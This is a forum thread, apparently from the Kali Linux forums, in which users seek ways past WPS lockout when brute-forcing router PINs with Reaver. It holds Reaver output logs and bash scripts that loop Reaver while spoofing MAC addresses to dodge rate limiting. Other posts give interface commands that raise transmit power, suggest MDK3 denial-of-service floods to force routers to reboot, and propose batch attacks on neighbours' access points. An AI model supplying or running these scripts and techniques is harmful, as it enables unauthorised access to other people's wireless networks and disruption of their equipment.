Results 1 to 46 of 46

Thread: Reaver - WPS Locked Situation and Useful Link.

  1. #1
    Join Date
    2013-Dec
    Posts
    5

    Reaver - WPS Locked Situation and Useful Link.

    My impression is that Reaver is becoming increasingly unusable due to the fact that router manufacturers have compensated for its abilities and for those of similar tools like Bully.

    In particular, the problem is one of WPS locking.

    For example:

    [+] Associated with 00:11:22:33:44:55 (ESSID: XXXXXXX)
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

    And so on....

    I check with wash and it tells me the WPS is locked.

    I have tried the -L option which supposedly ignores the locked state.

    [+] Trying pin 000966329
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 00096639
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred

    And so on...

    Two questions:

    1. My impression is that there is no way to overcome a WPS Locked situation. One just has to wait until the WPS becomes unlocked. How long does this take on average? I've waited several hours and wash still says the AP is locked. Is there a specific time limit? Or is it until the router is manually reset?

    2. Are there any alternative tools that people would recommend? I've briefly tried Bully but it still has the same problem which makes sense since the issue is not with Reaver but with the AP itself. Or perhaps a tool that does not crack WPS. I used Pyrit some time ago but was never successful. I also once tried a commercial WPS cracker but that also failed.

    Also - this is an interesting link about the limitations of Reaver in the context of WPS locking: http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29

    The authors suggestion is to be ultra-cautious and use -d 300 to prevent WPS locking. This does, of course, mean that any success will take ages.

  2. #2
    Join Date
    2013-Mar
    Location
    sanfrancisco.ca ;
    Posts
    6
    Some routers will just block the mac address after a few failed WPS attempts. So you can bash your way with macchanger -r to some success.

    However anything new as you said tend to lock completely. You have to get fancy with trying to reset it to carry on.

    soxrok2212 started a great thread touching on this: https://forums.kali.org/showthread.p...struction-Mode

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Check out my post (register mentioned it above also). You can use MDK3 to DOS the router which MAY cause it to reboot and unlock WPS for a little while.

  4. #4
    Join Date
    2013-Jul
    Posts
    844
    If you suspect a router is blocking your WPS pin attempts by comparing pin requests against mac codes. Go to the following link and download varmacreaver.sh This program starts reaver makes some pin requests shuts down changes its mac and restarts. The program is menu driven so you start it and walk away.

    https://forums.kali.org/showthread.p...-Free-Download


    If you suspect reaver is not working make sure you have the latest version of kali. Find the thread entitled handling the 99.99% problem with reaver in these forums.

    And remember it is not reaver that is the problem. Software engineers are aware of the WPS flaw and are writing programs to close it. Nothing stays the same.

    Follow soxrox2212 as he is leading an effort at present to get around these countermeaures.

    Musket Team Alpha

  5. #5
    Join Date
    2013-Oct
    Location
    Earth
    Posts
    4
    Hi.
    I have several WPS locking APs in my neighbourhood.
    It would be useful to have script that automates Reaver for batch attack.
    It could look like this:

    reaver attack AP_1
    if `Detected AP rate limiting`
    save session
    reaver attack AP_2
    if `Detected AP rate limiting`
    save session
    reaver attack AP_xy...
    sleep for x seconds
    here we go again

    Of course, many things can go wrong with Reaver, but it would be interesting to test it.

    Im sure someone in this vast community can code such timesaver.

  6. #6
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by slobodanM View Post
    It would be useful to have script that automates Reaver for batch attack.
    Im sure someone in this vast community can code such timesaver.
    Musket Team Alpha and I are working on this, though as of right now, it is not fully automated. The script attacks an AP BUT the user has to input when they think/know the router reset. We are working on making this project public soon.

  7. #7
    Join Date
    2013-Jun
    Posts
    125

    AP Rate limiting is not affected by changing mac address when attempting pins

    Quote Originally Posted by bad_bobby View Post
    My impression is that Reaver is becoming increasingly unusable due to the fact that router manufacturers have compensated for its abilities and for those of similar tools like Bully.

    In particular, the problem is one of WPS locking.

    For example:

    [+] Associated with 00:11:22:33:44:55 (ESSID: XXXXXXX)
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
    [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

    And so on....

    I check with wash and it tells me the WPS is locked.

    I have tried the -L option which supposedly ignores the locked state.

    [+] Trying pin 000966329
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 00096639
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred

    And so on...

    Two questions:

    1. My impression is that there is no way to overcome a WPS Locked situation. One just has to wait until the WPS becomes unlocked. How long does this take on average? I've waited several hours and wash still says the AP is locked. Is there a specific time limit? Or is it until the router is manually reset?

    2. Are there any alternative tools that people would recommend? I've briefly tried Bully but it still has the same problem which makes sense since the issue is not with Reaver but with the AP itself. Or perhaps a tool that does not crack WPS. I used Pyrit some time ago but was never successful. I also once tried a commercial WPS cracker but that also failed.

    Also - this is an interesting link about the limitations of Reaver in the context of WPS locking: http://sethioz.com/mediawiki/index.p...PA/WPA2/WEP%29

    The authors suggestion is to be ultra-cautious and use -d 300 to prevent WPS locking. This does, of course, mean that any success will take ages.



    Your Impression is true..the companies that produced these new routers realised the WPS flaw. As a result they have tighten up their controls on WPS security and this include the AP rate limiting feature. I tried using the following script:

    #!/bin/bash
    #Changing Mac Address to random Mac Address
    while :; do echo
    echo "Changing Mac Address to random Mac Address..";
    ifconfig mon0 down;
    ifconfig mon0 down;
    ifconfig wlan2 down;
    ifconfig wlan2 down;
    macchanger -r mon0;
    macchanger -r wlan2;
    ifconfig mon0 up;
    ifconfig mon0 up;
    ifconfig wlan2 up;
    ifconfig wlan2 up;
    echo "Mac Address Changed and interface is up!"
    #running reaver 1.4
    echo "running reaver 1.4"
    echo y|reaver -i mon0 -b C87:19:89:E7:13 -c1 -vv -t 20 -n -d10 -g1 -L;
    sleep 1
    done

    WHAT THE SCRIPT WAS DOING
    1. changes my mac interface mac address address
    2. runs the reaver program which will try one key and terminate itself
    3. changes my mac address and then try the reaver one key again
    THIS PROCESS GOES ON INFINTELY unless manually stopped.

    OBSERVATION
    reaver still indicate that the APs are rate limiting pin attempts. the wash tool also indicate the WPS "yes" (locked) for the APs. I am now convince that these new routers are not rate limiting pins due to one device mac consistently trying pins.

    Other Alternatives
    Pyrit is a wonderful tool if used with a Graphics Card and crunch to do a brute force attack. however trying ALL the possible PERMUTATIONS (NOT COMBINATIONS) for alpha numeric digits for 9 digit password(A-Z,a-z,0-9)will over a decade.hopefully if you use a dictionary you might need to pray that the password is in...

  8. #8
    Join Date
    2013-Jun
    Posts
    125

    Access points validate both half of pins at once

    It appears that new routers/ access points are not validating first half of pin FIRST and AFTERWARDS second half of pin. When reaver tried the first pin "1234" it automatcally bruteforce the second half of the pin since reaver assume that the access point confirm that the first half of the pin is true because the AP request a message 5 for the second half of the pin. I have tried the new tool "bully" and it stick at the first pin it tried..using wireshark i observed the wps messages sent,that is my adapter sends a message 4 it waits for the response whether to see if the AP will send a WSC Nack or a message 5 (for second half of pin).if the AP sends a message 5 reaver assumes that first half of the pin is correct and bruteforce second half of pin.. but this does not mean that the first half of the pin is correct, i am sure this means that the AP is requesting the first half of the pin and then the second half of the pin and then determine whether the complete pin is correct or not!!! Is there any tool that can try all pin combinations without checking to see if the first half of the pin is correct or not?..I will appreciate everyone brainstorming/ idiea on this... thank you.

  9. #9
    Join Date
    2014-Jan
    Posts
    12
    There's a modified version of reaver call ryreaver-reverse, but i can't make it work in kali debian, only work in backtrack 5rc3 ubuntu.


    "and commands are same as normal reaver. as explained this one worked on a station where normal reaver failed. normal reaver got first part of the WPS pin, but failed to get last 3 digits + checksum (last 4 digits in total), but this one did it!"

    http://sethioz.com/forum/viewtopic.php?p=9757

    Hope someone can figure it out how to make it work in kali, does it have to be compile for debian?
    Last edited by fonzy35; 2014-03-19 at 11:43.

  10. #10
    Join Date
    2013-Jul
    Posts
    844
    To: repzeroworld

    Our Team wishs to point out that the series off commands you are using to spoof a mac when using reaver will not work. You can test this easily enough. Just start a reaver attack after trying to spoof a mac your way. Next open up an airodump-ng on the channel -c and bssid -b of your target and look to see exactly what mac is being produced.

    You are doing two(2) things wrong;

    1. You must add the spoofed mac address to the reaver command line. see reaver help files.

    2. Prior to running reaver you must run the following

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    iw reg set BO # optional to boost power FOR awuso36h
    ifconfig wlan0 up
    iwconfig wlan0 channel 13 # optional to boost power FOR awuso36h
    iwconfig wlan0 txpower 30 # optional to boost power FOR awuso36h
    iwconfig wlan0 rate 1M # optional to boost power FOR awuso36h
    airmon-ng start wlan0
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up

    MTA

  11. #11
    Join Date
    2013-Jul
    Posts
    844
    To: repzeroworld


    One thing we forgot to mention!!!

    The mac you spoof with the series off commands we gave you MUST be the same mac that is seen in the reaver command line.

    See example listed below:

    reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv -x 60 --mac=00:11:22:33:44:55

  12. #12
    Quote Originally Posted by fonzy35 View Post
    There's a modified version of reaver call ryreaver-reverse, but i can't make it work in kali debian, only work in backtrack 5rc3 ubuntu.


    "and commands are same as normal reaver. as explained this one worked on a station where normal reaver failed. normal reaver got first part of the WPS pin, but failed to get last 3 digits + checksum (last 4 digits in total), but this one did it!"

    http://sethioz.com/forum/viewtopic.php?p=9757

    Hope someone can figure it out how to make it work in kali, does it have to be compile for debian?
    I did get this to work in kali (cant remember how now as doing a rebuild) - but it is a bit quirky - it does not at this time save/restart a session it is solely used to trap the last 3 digits + checksum.

    What that means I guess is that if you have the first 4 digits of the pin and reaver can't find the last then run the first 4 through ryreaver-reverse and see
    if it will catch the last 4.

    I contacted sethioz on the forum concerning the save/restart issue and he informed me that the guy who rewrote reaver for this eventuality is away for
    several months on holiday, but hopefully, when he comes back he may be able to resolve the issues.

    Rab.

  13. #13
    Join Date
    2014-Jan
    Posts
    12
    Quote Originally Posted by flyinghaggis View Post
    I did get this to work in kali (cant remember how now as doing a rebuild) - but it is a bit quirky - it does not at this time save/restart a session it is solely used to trap the last 3 digits + checksum.

    What that means I guess is that if you have the first 4 digits of the pin and reaver can't find the last then run the first 4 through ryreaver-reverse and see
    if it will catch the last 4.

    I contacted sethioz on the forum concerning the save/restart issue and he informed me that the guy who rewrote reaver for this eventuality is away for
    several months on holiday, but hopefully, when he comes back he may be able to resolve the issues.

    Rab.
    Thanks for the reply flyinghaggis, if you remember how you did manage to make it work in kali, let me know. It would be very appreciated.

    TIA

  14. #14
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by mmusket33 View Post
    To: repzeroworld

    Our Team wishs to point out that the series off commands you are using to spoof a mac when using reaver will not work. You can test this easily enough. Just start a reaver attack after trying to spoof a mac your way. Next open up an airodump-ng on the channel -c and bssid -b of your target and look to see exactly what mac is being produced.

    You are doing two(2) things wrong;

    1. You must add the spoofed mac address to the reaver command line. see reaver help files.

    2. Prior to running reaver you must run the following

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    iw reg set BO # optional to boost power FOR awuso36h
    ifconfig wlan0 up
    iwconfig wlan0 channel 13 # optional to boost power FOR awuso36h
    iwconfig wlan0 txpower 30 # optional to boost power FOR awuso36h
    iwconfig wlan0 rate 1M # optional to boost power FOR awuso36h
    airmon-ng start wlan0
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up

    MTA
    I have been spoofing my mac address using this method to bypass mac filtering mechanisms of open hotspots and it worked! Additionally i have used wireshark and airodump to verify that my interface mac address is the spoofed mac address!. Probably you can check out the Backtrack 5 Wireless Penetration testing book by vivek to verify this as well. The only problem with my script is that i should not have randomly spoof the mac address of wlan1 since wlan1 is down and not 'apparently' in use. I AM NOT SAYING THAT YOUR METHOD IS INCORRECT BUT THEY AREN'T ONLY ONE WAY IN LINUX TO DO THINGS!

    As further evidence i have spoofed my mac to reflect 2e:be:88:ac:97:3e!


    root@localhost:~# ifconfig mon0 down
    root@localhost:~# macchanger -m 2e:be:88:ac:97:3e mon0
    Permanent MAC: 00:c0:ca:6d:ac:fa (Alfa, Inc.)
    Current MAC: 88:cc:b5:c4:6d:aa (unknown)
    New MAC: 2e:be:88:ac:97:3e (unknown)


    airodump-ng shows my spoof mac is associated with access point!

    CH 6 ][ Elapsed: 51 s ][ 2014-03-22 10:35

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    9C3:6D:B0:1A:A2 -83 72 303 29 0 6 54e WPA2 CCMP PSK NETGEAR23omar

    BSSID STATION PWR Rate Lost Frames Probe

    9C3:6D:B0:1A:A2 2E:BE:88:AC:97:3E 0 1 - 1 0 106



    Wireshark shows that packets sent are using my spoofed mac 2e:be:88:ac:97:3e when reaver is in use!

    2028 13.061631000 2e:be:88:ac:97:3e Netgear_b0:1a:a2 EAP 84 Response, Identity
    2029 13.064236000 Netgear_b0:1a:a2 2e:be:88:ac:97:3e EAP 71 Request, Identity
    2350 15.029302000 Netgear_b0:1a:a2 2e:be:88:ac:97:3e EAP 472 Request, Expanded Type, WPS, M1




    IEE 802.11 protocol in wireshark shows Receiver address and Destination address are my spoof mac!
    this extract from wireshark is below

    IEEE 802.11 Data, Flags: ....R.F.C

    Receiver address: 2e:be:88:ac:97:3e (2e:be:88:ac:97:3e)
    Destination address: 2e:be:88:ac:97:3e (2e:be:88:ac:97:3e)
    Transmitter address: Netgear_b0:1a:a2 (9c:d3:6d:b0:1a:a2)
    BSS Id: Netgear_b0:1a:a2 (9c:d3:6d:b0:1a:a2)
    Source address: Netgear_b0:1a:a2 (9c:d3:6d:b0:1a:a2)
    Last edited by repzeroworld; 2014-03-22 at 14:50.

  15. #15
    Join Date
    2013-Jun
    Posts
    125
    ..........
    Last edited by repzeroworld; 2014-03-22 at 15:18.

  16. #16
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by fonzy35 View Post
    Thanks for the reply flyinghaggis, if you remember how you did manage to make it work in kali, let me know. It would be very appreciated.

    TIA
    To: flyinghaggis
    Thanks for expressing your idea, i appreciate this..i will try this tool..however i am using the new wps cracking tool known as 'bully', it works amazing well...it is built using C programming and it have the option of brutforcing the last digit/checksum digit... it tries ALL possible PERMUTATION of the last 4 digit of the wps pin! the only problem that i have with this tool is that it does not show detailed messages as shown in reaver (with a -vv flag). Other than that is program works well!

  17. #17
    Join Date
    2013-Jul
    Posts
    844
    To Repzeroworld

    When mac spoofing sites like hotspots etc you are correct. We use the exact same commands you are using. However with reaver you need to use the series of commands and addittions to the reaver command line or reaver will not function correctly. For second,third and fourth opinions on this we suggest you go to the WPS-Reaver site in google and work thru the help files. This problem is explored in depth there. This is a common error with reaver users. We made the same mistake a few years ago.

  18. #18
    Join Date
    2013-Jun
    Posts
    125

    Thank you MMUSKET33.

    Quote Originally Posted by mmusket33 View Post
    To Repzeroworld

    When mac spoofing sites like hotspots etc you are correct. We use the exact same commands you are using. However with reaver you need to use the series of commands and addittions to the reaver command line or reaver will not function correctly. For second,third and fourth opinions on this we suggest you go to the WPS-Reaver site in google and work thru the help files. This problem is explored in depth there. This is a common error with reaver users. We made the same mistake a few years ago.


    TO: MMUSKET 33


    Thank you for bringing this to my attention!
    I have made my script without focusing on a small this piece of information in the mac spoofing area in the reaver help section.The reaver program is behaves somewhat
    different i suppose

    A BETTER UNDERSTANDING WHY REAVER BEHAVES DIFFRENTLY WHEN ONLY VIRTUAL MAC ADDRESS INTERFACE IS CHANGED

    I observed that my script ran the reaver program "ok" meaning that it " SOMETIMES" sucessfully attempted pins. however, frequently
    the reaver program get stuck at the "Sending identity response", I believe that changing the virtual interface of mon0 SOMETIMES affects "diffie-hellman" secret numbers
    process which takes place at message 1 and 2 to agree on a common opened shared key before requesting the first pin. A couple of Access points
    refused to send message 1 because of this.....Nevertheless instead of using the ifconfig utility to change my physical mac. I
    have used the macchanger utility to change my physical interface and my virtual interface which reaver use.
    I ran reaver without using the -m flag (since i have already used macchanger to change my mac instead of giving reaver this option)and
    it successfully completed that diffie-hellman stage (message 1 and 2)!


    REVISED SCRIPT
    i have modified my script to change my physical and virtual interface to specific defined mac address.

    My script is now a little lengthy and it changes my mac address once after a pin is tried for 11 times and after that the script
    restarts itself(I am still reading a book on bash scripting so i supposed once i finised this book i will find a way to reduce this script length.


    YOUR OPONION

    What is your opinion on the new measures enacted for wps security?. I have tried my revised script and it seems that changing my mac address
    at every pin attempt have no effect on the new cisco routers!. these router exponentially relates pin attempts with its wps locking feature..I observed that the more bad pin attempts tried the router locks up for longer period of time!.Also i am assessing another router that request both half of the pins at once which makes reaver believes that message 5 recieved means that the first half of the pin is correct!.
    I did some searching on the web and found that this is a new measure for wps 2.0 version.seems like this sweet little program, reaver, was
    taken seriously..haha..


    however my revised script is below
    #!/bin/bash
    #Changing Mac Address to random Mac Address
    while :; do echo
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 88:51:e4:b8:d6:51 mon0;
    printf "changing mac address of wlan1 interface\n";
    sleep 3;
    macchanger -m 88:51:e4:b8:d6:51 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4"\n;
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #SECOND TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 3a:d8:5a:9e:d2:f7 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m 3a:d8:5a:9e:d2:f7 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4"\n;
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #THIRD TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m aa:6d:9b:58:f0:83 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m aa:6d:9b:58:f0:83 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4"\n;
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #THIRD TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 9a:92:2f:79:69:f1 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m 9a:92:2f:79:69:f1 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4"\n;
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #FOUR TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    printf "changing mac address of wlan1 interface\n";
    sleep 3;
    ### THIS PROCESS GOES UNTIL UNTIL 11 ATTEMPS AND RESTARTS

  19. #19
    Join Date
    2013-Jun
    Posts
    125

    Thank you MMUSKET33.

    Quote Originally Posted by mmusket33 View Post
    To Repzeroworld

    When mac spoofing sites like hotspots etc you are correct. We use the exact same commands you are using. However with reaver you need to use the series of commands and addittions to the reaver command line or reaver will not function correctly. For second,third and fourth opinions on this we suggest you go to the WPS-Reaver site in google and work thru the help files. This problem is explored in depth there. This is a common error with reaver users. We made the same mistake a few years ago.


    TO: MMUSKET 33


    Thank you for bringing this to my attention!
    I have made my script without focusing on a small this piece of information in the mac spoofing area in the reaver help section.The reaver program is behaves somewhat
    different i suppose

    A BETTER UNDERSTANDING WHY REAVER BEHAVES DIFFRENTLY WHEN ONLY VIRTUAL MAC ADDRESS INTERFACE IS CHANGED

    I observed that my script ran the reaver program "ok" meaning that it " SOMETIMES" sucessfully attempted pins. however, frequently
    the reaver program get stuck at the "Sending identity response", I believe that changing the virtual interface of mon0 SOMETIMES affects "diffie-hellman" secret numbers
    process which takes place at message 1 and 2 to agree on a common opened shared key before requesting the first pin. A couple of Access points
    refused to send message 1 because of this.....Nevertheless instead of using the ifconfig utility to change my physical mac. I
    have used the macchanger utility to change my physical interface and my virtual interface which reaver use.
    I ran reaver without using the -m flag (since i have already used macchanger to change my mac instead of giving reaver this option)and
    it successfully completed that diffie-hellman stage (message 1 and 2)!


    REVISED SCRIPT
    i have modified my script to change my physical and virtual interface to specific defined mac address.

    My script is now a little lengthy and it changes my mac address once after a pin is tried for 11 times and after that the script
    restarts itself(I am still reading a book on bash scripting so i supposed once i finised this book i will find a way to reduce this script length.


    YOUR OPONION

    What is your opinion on the new measures enacted for wps security?. I have tried my revised script and it seems that changing my mac address
    at every pin attempt have no effect on the new cisco routers!. these router exponentially relates pin attempts with its wps locking feature..I observed that the more bad pin attempts tried the router locks up for longer period of time!.Also i am assessing another router that request both half of the pins at once which makes reaver believes that message 5 recieved means that the first half of the pin is correct!.
    I did some searching on the web and found that this is a new measure for wps 2.0 version.seems like this sweet little program, reaver, was
    taken seriously..haha..


    however my revised script is below
    #!/bin/bash
    #Changing Mac Address to random Mac Address
    while :; do echo
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 88:51:e4:b8:d6:51 mon0;
    printf "changing mac address of wlan1 interface\n";
    sleep 3;
    macchanger -m 88:51:e4:b8:d6:51 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4"\n;
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #SECOND TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 3a:d8:5a:9e:d2:f7 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m 3a:d8:5a:9e:d2:f7 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4"\n;
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #THIRD TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m aa:6d:9b:58:f0:83 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m aa:6d:9b:58:f0:83 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4"\n;
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #THIRD TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    sleep 3;
    macchanger -m 9a:92:2f:79:69:f1 mon0;
    printf "changing mac address of wlan1 interface\n";
    macchanger -m 9a:92:2f:79:69:f1 wlan1;
    ifconfig mon0 up;
    printf "Mac Address Changed and interface is up!\n";
    sleep 3;
    #running reaver 1.4
    printf "running reaver 1.4"\n;
    echo y|reaver -i mon0 -b C87:19:0A:BF:35 -vv -t 20 -N -d10 -l35 -g1 ;
    sleep 2;
    #FOUR TIME
    #Changing Mac Address to random Mac Address
    printf "Changing Mac Address to random Mac Address\n";
    sleep 3;
    printf "bringing down wlan1\n";
    sleep 3;
    ifconfig wlan1 down;
    ifconfig wlan1 down;
    printf "bringing down mon0\n";
    ifconfig mon0 down;
    ifconfig mon0 down;
    printf "changing mac address of mon0 interface\n";
    printf "changing mac address of wlan1 interface\n";
    sleep 3;
    ### THIS PROCESS GOES UNTIL ATTEMPS AND RESTARTS

  20. #20
    Join Date
    2013-Jul
    Posts
    844
    To repzeroworld

    Reference your mac changing script for reaver - again you are using the wrong initital commands and you have failed to put a --mac=00:11:22:33:44:55 in the reaver command line.

    There is a bash program that does this for you. Download varmacreaver.sh at
    http://www.axifile.com/en/CFC3101780

    Reference firmware WPS locking. These forums have a wealth of info. Search WPS lock and reseting routers.

    We have neved gotten mac changing to work when using virtual programs

    MTC

  21. #21
    Join Date
    2013-Jun
    Posts
    125
    Quote Originally Posted by mmusket33 View Post
    To repzeroworld

    Reference your mac changing script for reaver - again you are using the wrong initital commands and you have failed to put a --mac=00:11:22:33:44:55 in the reaver command line.

    There is a bash program that does this for you. Download varmacreaver.sh at
    http://www.axifile.com/en/CFC3101780

    Reference firmware WPS locking. These forums have a wealth of info. Search WPS lock and reseting routers.

    We have neved gotten mac changing to work when using virtual programs

    MTC
    i prefer to use my own since it works well .thank you and have a great day!


    COMMON SENSE
    by the way reading the reaver help tutorial shows that you only use --mac flag which give reaver the option of spoofing your mac address on the monitor interface IF YOU HAVEN'T DONE THAT WITH ANY OTHER UTILITY for the MONITOR INTERFACE as seen from the example..i have already spoofed by mac address on the monitor interface with macchanger instead of giving reaver this option.I prefer to end this discussion with your team since it appears that you are not open up to new ideas and thinking which i detest.it also seems that your imposing your own script on people!....thank you and have a great day!
    Last edited by repzeroworld; 2014-03-23 at 20:10.

  22. #22
    Join Date
    2013-Jun
    Posts
    125
    TO: EVERYONE- EFFECTIVE WAY TO RESET A MODERN CISCO ACCESS POINT BY FLOODING FOR 10-20 SECONDS!
    i have found a way to effectively flood a new model (either year 2012/2013 manufactured) cisco router to make it reboot with a wps locked
    status as "NO". Also i will prove that using Authentication DOS mode flooding has no effects of flooding THIS router!


    DETAILS OF THIS ROUTER

    From one of the M1 EAP packets captured from my wireless card, details of this router are as follows

    bssid c8:d7:19:0a:bf:35
    Manufacturer: Cisco
    Model Number: 123
    Serial Number: 12345
    Model Name: WAP
    Channel type: 802.11g (pure-g) (0x00c0)

    I did some research using these details found found out that this access point was modern in age.

    Behaviour of this CISCO Router

    This type of router is not affected by a script changing your mac address. Also if you try a 3 pins the router starts
    an exponential clock that rate limit another counple of pins reaver tries and then the router totally lock itself for one/two day.
    even if i gave reaver the option to try 1 pin every 3 minutes (worthless).. after a couple of pin attempts it locks up one/two days.
